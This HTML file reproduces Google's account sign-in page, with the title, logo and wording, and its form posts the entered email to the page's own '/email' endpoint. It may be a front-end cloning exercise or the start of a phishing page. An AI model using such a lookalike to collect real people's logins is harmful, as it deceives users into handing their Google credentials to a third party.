<!DOCTYPE html>
<html lang="en">
  <head>
    <meta charset="UTF-8" />
    <meta name="viewport" content="width=device-width, initial-scale=1.0" />

    <link rel="preconnect" href="https://fonts.gstatic.com" />
    <link
      href="https://fonts.googleapis.com/css2?family=Roboto:wght@300;400&display=swap"
      rel="stylesheet"
    />

    <link rel="stylesheet" href="css/reset.css" />
    <link rel="stylesheet" href="css/styles.css" />

    <title>Sign in - Google Accounts</title>
  </head>

  <body>
    <div class="container">
      <div class="card">
        <img src="./images/google-logo.svg" alt="" />
        <h2>Sign in</h2>
        <h3>Use your Google Account</h3>

        <form method="POST" action="/email">
          <input type="email" name="email" placeholder="Email or phone" />
          <div class="btn-email">
            <button type="button">Forgot email?</button>
          </div>
          <p>
            Not your computer? Use Guest mode to sign in privately.
            <a href="">Learn more</a>
          </p>

          <div class="card-bottom">
            <a href="">Create account</a>
            <button type="submit">Next</button>
          </div>
        </form>
      </div>

      <div class="footer">
        <select name="select">
          <option value="English (United States)">Deutsch</option>
        </select>

        <div class="footer-span">
          <span>Help</span>
          <span>Privacy</span>
          <span>Terms</span>
        </div>
      </div>
    </div>
  </body>
</html>
